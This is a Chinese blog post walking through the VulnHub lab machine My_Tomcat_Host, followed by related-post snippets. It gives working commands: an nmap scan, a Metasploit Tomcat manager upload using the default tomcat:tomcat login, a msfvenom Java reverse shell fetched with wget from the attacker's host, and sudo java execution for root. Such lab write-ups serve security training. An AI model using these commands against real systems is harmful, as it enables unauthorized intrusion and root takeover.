vulnhub:My_Tomcat_Host靶机

已于 2023-02-01 17:06:30 修改
阅读量141 收藏
点赞数
文章标签: 网络安全 Powered by 金山文档
于 2023-02-01 17:02:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/128837030
版权
该文章描述了一次针对192.168.111.171靶机的渗透测试过程,通过nmap进行端口扫描,尝试用弱口令登录Tomcat后台,使用MSF模块上传并执行Java反弹shell,最终通过nc监听并获取flag。
摘要由CSDN通过智能技术生成

kali:192.168.111.111

靶机:192.168.111.171

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.171

访问8080端口

尝试弱口令tomcat:tomcat登录后台

使用msf模块exploit(multi/http/tomcat_mgr_upload)上传shell

set rhosts 192.168.111.171
set rport 8080
set httpusername tomcat
set httppassword tomcat
run

提权

sudo -l

发现可以执行java

msfvenom生成java反弹shell

msfvenom -p java/shell_reverse_tcp lhost=192.168.111.111 lport=5555 -f jar -o shell.jar

本地使用python开启http服务,目标wget下载生成的jar文件

python3 -m http.server
wget http://192.168.111.111:8000/shell.jar

nc本地侦听端口后,执行上传的反弹shell

nc -lvp 5555

sudo -u root /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java -jar shell.jar

获得flag

ctostm
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
部署vulhub靶场,复现tomcat put上传漏洞
weixin_67813445的博客
02-12 115
CVE-2017-12615漏洞称之为Tomcat PUT方法任意写文件漏洞,类似IIS的PUT上传漏洞。该漏洞可以利用HTTP的PUT方法直接上传webshell到目标服务器,从而获取权限。该漏洞是高危漏洞,在Tomcat的web.xml默认情况下不存在该漏洞,但是一单开发者或者运维人员手动讲web.xml中的readonly设置为false,可以通过 PUT / DELETE 进行文件操控。
docker下载及vulhub靶场
KUKULI233的博客
12-18 1128
Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行一条命令即可编译、运行一个完整的漏洞靶场镜像。 Installation 在Ubuntu 20.04下安装docker/docker-compose: 安装pip curl -s https://bootstrap.pypa.io/get-pip.py | python3 安装最新版docker curl -s https://get.docker.com/ | sh 在测试或开发环境中 Docker 官方为了简化安装流程,提供了一
在 Ubuntu 上部署 Tomcat Web 应用
程序员小火龙的知识分享
03-28 1054
本篇是我在实验室部署考勤java后端的时候遇到了一些问题,于是重新下载安装tomcat部署了一遍,总结以下操作以及遇到的bug修复。
vulnhub—My tomcat host
weixin_41949487的博客
04-15 481
一、确定靶机Ip nmap扫描存活主机,不进行端口扫描 nmap -sn ip # 扫描存活主机,不进行端口扫描; 现在就需要判断一下哪一个是靶机的Ip地址。 nmap -A ip # 综合扫描 131这个Ip没有什么发现,试试另一个 发现这些,说明靶机Ip是192.168.249.135。 二、第一个flag 根据刚才扫描出的内容,先访问robots.txt...
vulnhub My_Tomcat
底层社会中的弱智
04-14 265
内网扫描发现目标主机 目标IP 192.168.33.139 扫描端口服务 22 ssh openssh 6.6.1 8080 是apache tomcat 登录进去 使用bp的爆破 需要设置bses64加密后进行爆破 tomcat:tomcat 使用,msfveom制作war的反弹shell msfvenom -p java/shell_reverse_tcp ...
VulnHub靶机渗透】十:My_Tomcat_Host
野原新之助
06-01 995
靶机存在Tomcat管理后台弱口令以及文件上传漏洞。 VulnHub是一个安全平台,内含众多渗透测试的靶场镜像,只需要下载至本地并在虚拟机上运行,即可得到一个完整的渗透测试练习系统,每一个靶机都有目标去完成,大多是拿到root权限。
Vulnhub靶机渗透测试实战(一):My Tomcat Host: 1(新手)
siaowei44的博客
06-25 1892
Vulnhub靶机渗透测试实战(一):DC-1(入门) 这是一个入门级的渗透测试教程,傻瓜式教学,小白也能看的懂 靶机:DC-1 攻击者:kali 2019.2 攻击主机kali的安装教程就不给出了,网上有很多 (一)下载靶机 下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 下载完成后在VM中打开.ova文件 导入虚拟机,自定义安装位置 导入后运行该虚拟机,会到如下界面,我们要做的就是获取登录的账号密码 最后将DC-1运行在.
vulnhub靶场——CORROSION:2
Czheisenberg的博客
02-16 3142
vulnhub靶场——CORROSION:2 Wirteup
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
MyOA.rar_easy _myoa_myoa靶机_oa_ssh mysql 框架
09-24
【标题】"MyOA.rar_easy_myoa_myoa靶机_oa_ssh mysql 框架" 描述了一个基于SSH框架和MySQL数据库的在线办公(OA)系统,名为MyOA,并且它具有一个易于使用的前端界面——Easy UI。这个项目可能用于企业内部的自动化...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8415
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
2024.8.24.zip
08-25
2024.8.24.zip
中国移动实习项目-车票管理系统_ticket-management-system.zip
最新发布
08-25
中国移动实习项目-车票管理系统_ticket-management-system
ant-design-3.20.4.zip
08-25
ant-design,一套企业级 UI 设计语言和 React 组件库 提炼自企业级中后台产品的交互语言和视觉风格 开箱即用的高质量 React 组件
NOS量表(英文).pdf
08-25
NOS量表(英文).pdf
vulnhub靶机系列:
09-09
关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值